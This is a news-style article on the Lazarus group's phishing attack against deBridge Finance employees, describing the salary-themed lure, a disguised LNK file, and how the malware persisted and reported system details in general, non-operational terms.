Lazarus Hackers Enriching North Korea
The North Korean Lazarus group has identified themselves as one of the most notorious hacking group on the dark web. The Kim Jong Un funded hackers, no doubt, have cemented their status in the hacking world, over the past few years. Now, they have attempted to steal cryptocurrency from their latest victim, Debridge Finance, which is just one of many cryptocurrencies hijack the group have committed this year.
With Debridge Finance lucrative model; its cross–chain entity makes it the perfect target for the dark web hackers, as it allows for the decentralized transfer of assets between blockchains.
Sources reveal that Lazarus has taken a creative route in targeting this entity by using its employees against it. With a phishing email, the hackers tried to dupe employees of the company into running malware that gathered data from Windows systems, while allowing the delivery of malicious code to be executed in the later stages of the attack.
Lazarus Cunning Trick
This email was sent en masse to employees, and included an HTML file called ‘New Salary Adjustments’ disguised as a PDF file. In addition, a Windows shortcut file (.LNK) pretending to be a plain text file containing a user password. According to the email’s details, this update purportedly came from the company’s co-founder, Alex. Smirnov.
According to Smirnov’s Twitter statements, released shortly after the attack, the LNK file automatically runs Command Prompt with a specific set of commands, which retrieve a payload from a remote location. Not only that, by clicking the fake pdf, the victim would be taken to a cloud storage location that claimed to provide a password protected archive containing the PDF. This would prompt the victim to launch a fake text file to obtain the password.
Salary Increase Malware
The script was written to display a Notepad message with the text “pdf password: salary2022” and to determine whether the compromised system is protected by a Tencent, Bitdefender, or ESET security solution.
The script would then upload itself into the startup folder to ensure persistence if the processes for the aforementioned security products were not present. This enables the malware to persist and send a request for further instructions directly to the hacker’s command server.
The dark web hacker, at this point, would receive information about the compromised system; specifically the operating system, network adapters, the victim’s username, CPU, and other active processes.
According to Smirnov, only a few antivirus programs detected the malware used in the Lazarus hacking scheme.
Despite the email being sent to many employees, most of them reported this as suspicious. Only one employee was caught in the Trap, downloading and opening the documents. This is what allowed Smirnov to analyze the hack before Lazarus could etch another multi million dollar hack into their growing list of international cryptocurrencies hijack.